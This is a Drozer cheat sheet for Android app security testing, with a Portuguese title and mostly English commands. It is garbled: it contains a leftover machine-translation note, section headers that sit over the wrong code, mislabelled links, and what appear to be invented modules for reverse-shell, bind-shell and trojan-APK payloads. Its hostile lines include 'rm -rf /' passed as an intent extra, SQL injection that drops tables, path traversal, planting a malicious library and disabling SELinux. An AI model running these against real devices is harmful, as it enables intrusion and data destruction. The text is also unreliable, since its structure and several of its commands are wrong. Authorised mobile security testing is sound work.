Folha de Dicas do Drozer
## Visão Geral
Drozer é uma estrutura abrangente de teste de segurança para aplicações Android. Ele permite que você assuma o papel de um aplicativo Android e interaja com a Dalvik VM, endpoints IPC de outros aplicativos e o sistema operacional subjacente. Drozer fornece ferramentas para exploração remota de dispositivos Android através de aplicativos maliciosos e avaliação de segurança abrangente de aplicações Android.
⚠️ Aviso: Use o Drozer apenas em dispositivos e aplicativos que você possui ou tem permissão explícita para testar. O uso não autorizado pode violar termos de serviço ou leis locais.
Instalação
Pré-requisitos
Instalação no Linux
Instalação no macOS
Instalação no Windows
Configuração do Dispositivo Android
Uso Básico
Conectando ao Dispositivo
Comandos Básicos
Análise de Pacote
Informações do Pacote
Componentes do Aplicativo
Teste de Atividade
Enumeração de Atividade
Exploração de Atividade
Teste de Serviço
Enumeração de Serviço
Exploração de Serviço
Teste de Provedor de Conteúdo
Enumeração de Provedor de Conteúdo
Exploração de Provedor de Conteúdo
Teste de Receptor de Transmissão
Enumeração de Receptor de Transmissão
Exploração de Receptor de Transmissão
Análise do Sistema de Arquivos
Enumeração do Sistema de Arquivos
Exploração do Sistema de Arquivos
Note: Since no specific text was provided for sections 3-20, I’ve left them as section headers in Portuguese. If you want those sections translated as well, please provide the specific text.```bash
Install Java Development Kit
sudo apt update sudo apt install openjdk-11-jdk
Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip
Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot
Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo ‘export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64’ >> ~/.bashrc
### Linux Installation
```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl
# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py installmacOS Installation
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python 2.7
brew install python@2
# Install Drozer
pip2 install drozer
# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apkWindows Installation
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/
# Install Drozer using pip
pip install drozer
# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/Android Device Setup
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging
# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk
# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON
# Forward port for communication
adb forward tcp:31415 tcp:31415Basic Usage
Connecting to Device
# Connect to Drozer agent
drozer console connect
# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415
# List available devices
drozer console devices
# Connect to specific device
drozer console connect --device <device_id>Basic Commands
# List available modules
dz> list
# Get help for specific module
dz> help app.package.list
# List installed packages
dz> run app.package.list
# Get package information
dz> run app.package.info -a com.example.app
# List activities
dz> run app.activity.info -a com.example.app
# List services
dz> run app.service.info -a com.example.app
# List broadcast receivers
dz> run app.broadcast.info -a com.example.appPackage Analysis
Package Information
# List all packages
dz> run app.package.list
# List packages with filter
dz> run app.package.list -f keyword
# Get detailed package information
dz> run app.package.info -a com.example.app
# List package permissions
dz> run app.package.info -a com.example.app -p
# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET
# List system packages
dz> run app.package.list -f system
# List third-party packages
dz> run app.package.list -3Application Components
# List activities
dz> run app.activity.info -a com.example.app
# List exported activities
dz> run app.activity.info -a com.example.app -e
# List services
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -eActivity Testing
Activity Enumeration
# Find activities in package
dz> run app.activity.info -a com.example.app
# Find exported activities
dz> run app.activity.info -a com.example.app -e
# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i
# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERAActivity Exploitation
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity
# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret
# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data
# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com
# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug trueService Testing
Service Enumeration
# List services in package
dz> run app.service.info -a com.example.app
# List exported services
dz> run app.service.info -a com.example.app -e
# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMINService Exploitation
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService
# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"
# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"
# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundServiceContent Provider Testing
Content Provider Enumeration
# List content providers
dz> run app.provider.info -a com.example.app
# List exported content providers
dz> run app.provider.info -a com.example.app -e
# Find URIs for content provider
dz> run app.provider.finduri com.example.provider
# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.appContent Provider Exploitation
# Query content provider
dz> run app.provider.query content://com.example.provider/users
# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin
# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret
# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword
# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"
# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"
# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts
# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txtBroadcast Receiver Testing
Broadcast Receiver Enumeration
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e
# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETEDBroadcast Receiver Exploitation
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION
# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"
# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED
# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high
# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode trueFile System Analysis
File System Enumeration
# List application files
dz> run tools.file.list /data/data/com.example.app/
# Find readable files
dz> run tools.file.readable /data/data/com.example.app/
# Find writable files
dz> run tools.file.writable /data/data/com.example.app/
# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/File System Exploitation
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml
# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db
# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so
# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt
# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```## Análise de Banco de Dados
```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"
# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db
# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db
# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"
# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"
# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db
# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```## Análise de Rede
```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml
# List network interfaces
dz> run tools.setup.network
# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app
# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```### Teste de SSL/TLS
```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app
# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app
# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```## Exploração Avançada
```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py
from drozer.modules import common, Module
class CustomExploit(Module, common.FileSystem, common.PackageManager):
name = "Custom Exploit Module"
description = "Custom exploitation module"
examples = "run custom.exploit -a com.example.app"
author = "Security Researcher"
date = "2024-01-01"
license = "BSD (3 clause)"
path = ["custom"]
def add_arguments(self, parser):
parser.add_argument("-a", "--package", help="target package")
def execute(self, arguments):
if arguments.package:
self.stdout.write("Exploiting package: %s\n" % arguments.package)
# Custom exploitation logic here
else:
self.stdout.write("Please specify target package\n")
```### Geração de Payload
```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk
# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444
# Generate bind shell payload
dz> run payload.bind.shell --port 4444
# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```### Escalação de Privilégios
```bash
# Check for root access
dz> run tools.setup.busybox
# Exploit setuid binaries
dz> run exploit.setuid.find
# Test for kernel exploits
dz> run exploit.kernel.check
# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app
# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```## Scripts de Automação
```python
#!/usr/bin/env python2
import subprocess
import json
import sys
class DrozerAutomation:
def __init__(self, package_name):
self.package = package_name
self.results = \\\\{\\\\}
def run_drozer_command(self, command):
"""Execute Drozer command and return output"""
try:
cmd = ["drozer", "console", "connect", "-c", command]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return output.decode('utf-8')
except subprocess.CalledProcessError as e:
return f"Error: \\\\{e.output.decode('utf-8')\\\\}"
def analyze_package(self):
"""Perform comprehensive package analysis"""
print(f"[+] Analyzing package: \\\\{self.package\\\\}")
# Package information
self.results['package_info'] = self.run_drozer_command(
f"run app.package.info -a \\\\{self.package\\\\}"
)
# Activities
self.results['activities'] = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\}"
)
# Services
self.results['services'] = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\}"
)
# Content Providers
self.results['providers'] = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\}"
)
# Broadcast Receivers
self.results['receivers'] = self.run_drozer_command(
f"run app.broadcast.info -a \\\\{self.package\\\\}"
)
return self.results
def test_exported_components(self):
"""Test exported components for vulnerabilities"""
print("[+] Testing exported components")
# Test exported activities
exported_activities = self.run_drozer_command(
f"run app.activity.info -a \\\\{self.package\\\\} -e"
)
# Test exported services
exported_services = self.run_drozer_command(
f"run app.service.info -a \\\\{self.package\\\\} -e"
)
# Test exported providers
exported_providers = self.run_drozer_command(
f"run app.provider.info -a \\\\{self.package\\\\} -e"
)
return \\\\{
'exported_activities': exported_activities,
'exported_services': exported_services,
'exported_providers': exported_providers
\\\\}
def test_content_providers(self):
"""Test content providers for vulnerabilities"""
print("[+] Testing content providers")
# Find URIs
uris = self.run_drozer_command(
f"run app.provider.finduri \\\\{self.package\\\\}"
)
# Scan for accessible URIs
accessible_uris = self.run_drozer_command(
f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
)
return \\\\{
'uris': uris,
'accessible_uris': accessible_uris
\\\\}
def generate_report(self):
"""Generate comprehensive security report"""
report = \\\\{
'package': self.package,
'analysis_results': self.results,
'exported_components': self.test_exported_components(),
'content_provider_tests': self.test_content_providers()
\\\\}
with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
return report
# Usage
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python2 drozer_automation.py <package_name>")
sys.exit(1)
package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()
```### Script de Avaliação Abrangente
```bash
#!/bin/bash
# Batch testing script for multiple packages
PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"
mkdir -p $RESULTS_DIR
while IFS= read -r package; do
echo "[+] Testing package: $package"
# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"
# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"
# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"
# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"
echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"
echo "[+] Batch testing completed"
```### Script de Teste em Lote
```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity
# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415
# Restart ADB server
adb kill-server
adb start-server
# Check device connectivity
adb devices
# Test connection manually
telnet localhost 31415
```## Resolução de Problemas
```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk
# Check agent permissions
adb shell dumpsys package com.mwr.dz
# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions
# Check if agent service is running
adb shell ps|grep drozer
```### Problemas de Conexão
```bash
# Refresh module list
dz> reload
# Check module path
dz> list
# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/
# Debug module loading
dz> help custom.module
```### Problemas de Agente
```bash
# Check required permissions
adb shell dumpsys package com.example.app|grep permission
# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE
# Check SELinux status
adb shell getenforce
# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```### Problemas de Módulo
```bash
# Increase timeout values
dz> set timeout 30
# Reduce output verbosity
dz> set verbose false
# Clear cache
rm -rf ~/.drozer/cache/
# Use specific device
drozer console connect --device <device_id>
```### Problemas de Permissão
https://labs.f-secure.com/tools/drozer/##
# Problemas de Desempenho
https://github.com/FSecureLABS/drozer#
# Recursos
https://labs.f-secure.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf- [Documentação Oficial do Drozer](https://blog.securelayer7.net/android-penetration-testing-using-drozer/)https://owasp.org/www-project-mobile-security-testing-guide/- [Repositório GitHub do Drozer](https://developer.android.com/training/articles/security-tips)https://github.com/FSecureLABS/drozer/wiki/Writing-a-Module*Este guia rápido fornece uma referência abrangente para usar Drozer para testes de segurança de aplicações Android. Sempre certifique-se de ter autorização adequada antes de testar qualquer aplicativo ou dispositivo Android.*